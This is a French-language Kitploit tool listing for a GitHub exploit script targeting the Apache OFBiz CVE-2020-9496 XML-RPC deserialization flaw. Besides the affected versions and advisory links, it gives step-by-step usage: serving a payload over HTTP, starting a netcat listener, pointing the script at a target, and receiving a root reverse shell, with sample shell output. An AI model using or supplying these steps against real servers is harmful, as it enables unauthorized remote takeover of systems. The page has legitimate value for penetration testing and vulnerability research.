Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-9496 — Script d'exploit pour la vulnérabilité de désérialisation non sécurisée Apache OFBiz CVE-2020-9496, permettant l'exécution de code à distance via des requêtes XML-RPC conçues avec livraison de payload reverse shell. | Kitploit
Outils/GitHubGitHub/s4dbrd/cve-2020-9496
Analyse des VulnérabilitésExploitationExploitation d'Applications WebOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubs4dbrd/cve-2020-9496

CVE-2020-9496

Script d'exploit pour la vulnérabilité de désérialisation non sécurisée Apache OFBiz CVE-2020-9496, permettant l'exécution de code à distance via des requêtes XML-RPC conçues avec livraison de payload reverse shell.

Voir le dépôt
42il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-9496

Étant donné que les 2 requêtes liées à xmlrpc dans webtools (xmlrpc et ping) n'utilisent pas l'authentification, elles sont vulnérables à une désérialisation non sécurisée.
Ce problème a été signalé à l'équipe de sécurité par Alvaro Munoz [email protected] de l'équipe GitHub Security Lab.

Version affectée 17.12.01

Versions corrigées 18.12.01, 17.12.04

Blog original : https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/
Article d'Apache : https://issues.apache.org/jira/browse/OFBIZ-11716
POC de GitHub : https://github.com/g33xter/CVE-2020-9496

Pour que cet exploit fonctionne, vous devez suivre les étapes suivantes :

Étape 1 : Héberger un service HTTP avec python3

root@kitploit:~
> sudo python3 -m http.server 80

Étape 2 : Lancer un listener nc sur le port souhaité (Recommandé 8001)

root@kitploit:~
> nc -nlvp 8001

Étape 3 : Modifier l'URL du site web et le port dans le script :

root@kitploit:~
url='https://127.0.0.1' # CHANGE THIS                                                         
port=8443 # CHANGE THIS

Étape 4 : Exécuter l'exploit comme indiqué ci-dessous

root@kitploit:~
> ./cve-2020-9496.sh -i IP -p PORT

Étape 5 : Vérifier le listener nc

root@kitploit:~
❯ nc -nlvp 8001
listening on [any] 8001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.10.x.x] 57500
bash: cannot set terminal process group (31): Inappropriate ioctl for device
bash: no job control in this shell
root@poc:/usr/src/apache-ofbiz-17.12.01# id
id
uid=0(root) gid=0(root) groups=0(root)
root@poc:/usr/src/apache-ofbiz-17.12.01# 
Télécharger l’outil